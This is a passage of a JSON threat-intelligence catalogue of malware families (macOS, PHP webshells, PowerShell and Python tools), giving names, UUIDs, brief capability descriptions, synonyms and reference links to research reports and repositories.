"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", "https://objective-see.com/blog/blog_0x5F.html" ], "synonyms": [], "type": [] }, "uuid": "a73468d5-2dee-4828-8bbb-c37ea9295584", "value": "WatchCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail", "https://objective-see.com/blog/blog_0x3D.html", "https://objective-see.com/blog/blog_0x3B.html", "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/" ], "synonyms": [], "type": [] }, "uuid": "48751182-0b17-4326-8a72-41e4c4be35e7", "value": "WindTail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", "https://401trg.pw/winnti-evolution-going-open-source/" ], "synonyms": [], "type": [] }, "uuid": "5aede44b-1a30-4062-bb97-ac9f4985ddb6", "value": "Winnti (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", "https://objective-see.com/blog/blog_0x16.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", "value": "WireLurker (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://objective-see.com/blog/blog_0x43.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "f99ef0dc-9e96-42e0-bbfe-3616b3786629", "value": "Wirenet (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", "https://twitter.com/PhysicalDrive0/status/845009226388918273", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] }, "uuid": "858f4396-8bc9-4df8-9370-490bbb3b4535", "value": "X-Agent (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/", "https://objective-see.com/blog/blog_0x5F.html" ], "synonyms": [], "type": [] }, "uuid": "041aee7f-cb7a-4199-9fe5-494801a18273", "value": "XCSSET" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", "value": "XSLCmd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort", "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/", "https://objective-see.com/blog/blog_0x53.html" ], "synonyms": [], "type": [] }, "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", "value": "Yort" }, { "description": "Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell", "https://github.com/tennc/webshell/tree/master/php/Ani-Shell", "http://ani-shell.sourceforge.net/" ], "synonyms": [ "anishell" ], "type": [] }, "uuid": "7ef3c0fd-8736-47b1-8ced-ca7bf6d27471", "value": "Ani-Shell" }, { "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" ], "synonyms": [], "type": [] }, "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c", "value": "ANTAK" }, { "description": "C99shell is a PHP backdoor that provides a lot of functionality, for example:\r\n\r\n\r\n* run shell commands;\r\n* download/upload files from and to the server (FTP functionality);\r\n* full access to all files on the hard disk;\r\n* self-delete functionality.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.c99", "https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html" ], "synonyms": [ "c99" ], "type": [] }, "uuid": "cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2", "value": "c99shell" }, { "description": "FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a", "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf" ], "synonyms": [], "type": [] }, "uuid": "a782aac8-168d-4691-a182-237d7d473e21", "value": "DEWMODE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology", "https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/" ], "synonyms": [ "Ensiko" ], "type": [] }, "uuid": "dfd8deac-ce86-4a22-b462-041c19d62506", "value": "Ensikology" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], "type": [] }, "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", "value": "PAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker", "https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp" ], "synonyms": [], "type": [] }, "uuid": "e94a5b44-f2c2-41dc-8abb-6de69eb38241", "value": "RedHat Hacker WebShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "synonyms": [ "Webshell by Orb" ], "type": [] }, "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", "value": "WSO" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", "value": "Silence DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933", "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/", "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", "https://ironnet.com/blog/chirp-of-the-poisonfrog/", "https://www.netscout.com/blog/asert/tunneling-under-sands" ], "synonyms": [ "Glimpse", "Poison Frog" ], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", "value": "BONDUPDATER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200", "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/" ], "synonyms": [], "type": [] }, "uuid": "7373c789-2dc2-4867-9c60-fa68f8d971a2", "value": "CASHY200" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://vblocalhost.com/uploads/VB2020-46.pdf" ], "synonyms": [], "type": [] }, "uuid": "6f0f034a-13f1-432d-bc70-f78d7f27f46f", "value": "FlowerPower" }, { "description": "Loader used to deliver FRat (see family windows.frat)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md" ], "synonyms": [], "type": [] }, "uuid": "385a3dca-263d-46be-b84d-5dc09ee466d9", "value": "FRat Loader" }, { "description": "The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode", "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm", "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md", "https://www.certego.net/en/news/malware-tales-ftcode/", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/", "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/" ], "synonyms": [], "type": [] }, "uuid": "f727a05e-c1cd-4e95-b0bf-2a4bb64aa850", "value": "FTCODE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless", "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/", "https://research.checkpoint.com/malware-against-the-c-monoculture/" ], "synonyms": [], "type": [] }, "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html", "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html", "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines" ], "synonyms": [], "type": [] }, "uuid": "286a14a1-7113-4bed-97ce-8db41b312a51", "value": "JasperLoader" }, { "description": "According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot", "https://twitter.com/VK_Intel/status/1329511151202349057", "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/" ], "synonyms": [], "type": [] }, "uuid": "319c4b4f-2901-412c-8fa5-70be75ba51cb", "value": "LightBot" }, { "description": "The author describes Octopus as an \"open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.\"\r\n\r\nIt is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus", "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "https://isc.sans.edu/diary/26918", "https://github.com/mhaskar/Octopus" ], "synonyms": [], "type": [] }, "uuid": "c3ca7a89-a885-444a-8642-31019b34b027", "value": "Octopus (Powershell)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig", "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html", "https://twitter.com/MJDutch/status/1074820959784321026?s=19", "https://threatpost.com/oilrig-apt-unique-backdoor/157646/" ], "synonyms": [], "type": [] }, "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3", "value": "OilRig" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", "https://github.com/matthewdunwoody/POSHSPY" ], "synonyms": [], "type": [] }, "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerbrace", "https://norfolkinfosec.com/osint-reporting-on-dprk-and-ta505-overlap/", "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor" ], "synonyms": [], "type": [] }, "uuid": "7b334343-0045-4d65-b28a-ebf912c7aafc", "value": "PowerBrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper", "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/", "https://twitter.com/InQuest/status/1285295975347650562" ], "synonyms": [], "type": [] }, "uuid": "6544c75b-809f-4d31-a235-8906d4004828", "value": "PowerPepper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "60d7f668-66b6-401b-976f-918470a23c3d", "value": "POWERPIPE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor", "https://github.com/chrisjd20/powershell_web_backdoor" ], "synonyms": [], "type": [] }, "uuid": "4310dcab-0820-4bc1-8a0b-9691c20f5b49", "value": "powershell_web_backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower", "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/", "https://securelist.com/recent-cloud-atlas-activity/92016/" ], "synonyms": [], "type": [] }, "uuid": "0959a02e-6eba-43dc-bbbf-b2c7488e9371", "value": "PowerShower" }, { "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" ], "synonyms": [], "type": [] }, "uuid": "a4584181-f739-43d1-ade9-8a7aa21278a0", "value": "POWERSOURCE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "c07f6484-0669-44b7-90e6-f642e316d277", "value": "PowerSpritz" }, { "description": "POWERSTATS is a backdoor written in powershell.\r\nIt has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", "https://blog.prevailion.com/2020/01/summer-mirage.html", "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/", "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/", "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", "https://www.secureworks.com/research/threat-profiles/cobalt-ulster", "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/" ], "synonyms": [ "Valyria" ], "type": [] }, "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9", "value": "POWERSTATS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://www.symantec.com/security-center/writeup/2019-062513-4935-99", "https://norfolkinfosec.com/apt33-powershell-malware/", "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/", "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/", "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html" ], "synonyms": [], "type": [] }, "uuid": "08d5b8a4-e752-48f3-ac6d-944807146ce7", "value": "POWERTON" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" ], "synonyms": [], "type": [] }, "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", "value": "PowerWare" }, { "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure", "https://github.com/hausec/PowerZure" ], "synonyms": [], "type": [] }, "uuid": "f5fa77e9-9851-48a6-864d-e0448de062d4", "value": "PowerZure" }, { "description": "DLL loader that decrypts and runs a powershell-based downloader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop", "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://unit42.paloaltonetworks.com/thanos-ransomware/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/" ], "synonyms": [], "type": [] }, "uuid": "d8429f6d-dc4b-4aae-930d-234156dbf354", "value": "PowGoop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [], "type": [] }, "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, { "description": "The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox", "https://twitter.com/kafeine/status/1092000556598677504" ], "synonyms": [], "type": [] }, "uuid": "c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8", "value": "PresFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://youtu.be/pBDu8EGWRC4?t=2492", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html" ], "synonyms": [], "type": [] }, "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", "value": "QUADAGENT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" ], "synonyms": [], "type": [] }, "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks", "https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1" ], "synonyms": [], "type": [] }, "uuid": "3c627182-e4ee-4db0-9263-9d657a5d7c98", "value": "Schtasks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat", "https://github.com/YSCHGroup/SkyRAT" ], "synonyms": [], "type": [] }, "uuid": "8e5d7d24-9cdd-4376-a6c7-967273dfeeab", "value": "skyrat" }, { "description": "sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/", "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", "https://threatpost.com/sload-spying-payload-delivery-bits/151120/", "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/", "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [ "Starslord" ], "type": [] }, "uuid": "e78c0259-9299-4e55-b934-17c6a3ac4bc2", "value": "sLoad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy", "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/" ], "synonyms": [], "type": [] }, "uuid": "773a6520-d164-4727-8351-c4201b04f10b", "value": "Snugy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.swrort", "https://github.com/itsKindred/malware-analysis-writeups/blob/master/swrort-dropper/swrort-stager-analysis.pdf" ], "synonyms": [], "type": [] }, "uuid": "3347a1bc-6b4d-459c-98a5-746bab12d011", "value": "Swrort Stager" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", "https://github.com/Kevin-Robertson/Tater" ], "synonyms": [], "type": [] }, "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", "value": "Tater PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", "https://github.com/Mr-Un1k0d3r/ThunderShell" ], "synonyms": [], "type": [] }, "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", "value": "ThunderShell" }, { "description": "Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001", "https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/" ], "synonyms": [], "type": [] }, "uuid": "77231587-0dbe-4064-97b5-d7f4a2e3dc67", "value": "Unidentified PS 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine", "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/", "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry", "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/", "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/", "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf", "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/" ], "synonyms": [], "type": [] }, "uuid": "beb4f2b3-85d1-491d-8ae1-f7933f00f820", "value": "WannaMine" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader", "https://twitter.com/blackorbird/status/1247834024711577601" ], "synonyms": [], "type": [] }, "uuid": "c9ef106e-def9-4229-8373-616a298ed645", "value": "WannaRen Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" ], "synonyms": [], "type": [] }, "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", "value": "WMImplant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist", "https://github.com/NullArray/Archivist" ], "synonyms": [], "type": [] }, "uuid": "2095a09c-3fdd-4164-b82e-2e9a41affd8e", "value": "Archivist" }, { "description": "Ares is a Python RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.ares", "https://github.com/sweetsoftware/Ares" ], "synonyms": [], "type": [] }, "uuid": "c4a578de-bebe-49bf-8af1-407857acca95", "value": "Ares" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", "http://seclists.org/fulldisclosure/2017/Mar/7" ], "synonyms": [], "type": [] }, "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c", "https://github.com/0x09AL/DropboxC2C" ], "synonyms": [], "type": [] }, "uuid": "53dd4a8b-374e-48b6-a7c8-58af0e31f435", "value": "DropboxC2C" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer", "https://github.com/nairuzabulhul/KeyPlexer" ], "synonyms": [], "type": [] }, "uuid": "cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93", "value": "KeyPlexer" }, { "description": "The author 